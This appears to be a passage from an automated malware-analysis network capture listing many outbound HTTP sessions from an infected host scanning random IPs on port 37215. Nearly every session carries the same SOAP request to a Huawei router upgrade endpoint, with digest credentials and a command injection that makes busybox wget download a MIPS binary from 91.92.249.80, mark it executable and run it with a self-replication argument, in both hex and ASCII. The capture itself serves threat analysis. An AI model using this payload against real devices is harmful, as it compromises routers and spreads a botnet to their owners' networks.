                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1339192.168.2.2357308197.109.166.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332719088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1340192.168.2.236031241.195.208.5337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.333458900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1341192.168.2.234204883.140.246.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334115982 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1342192.168.2.234031241.71.123.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334158897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1343192.168.2.235831241.182.176.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334168911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1344192.168.2.2360616145.107.121.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334189892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1345192.168.2.2341272208.243.239.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334212065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1346192.168.2.2344756159.233.118.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334223986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1347192.168.2.2338312197.161.213.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334224939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1348192.168.2.2335734197.216.76.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334315062 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1349192.168.2.2338182189.73.202.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.334322929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
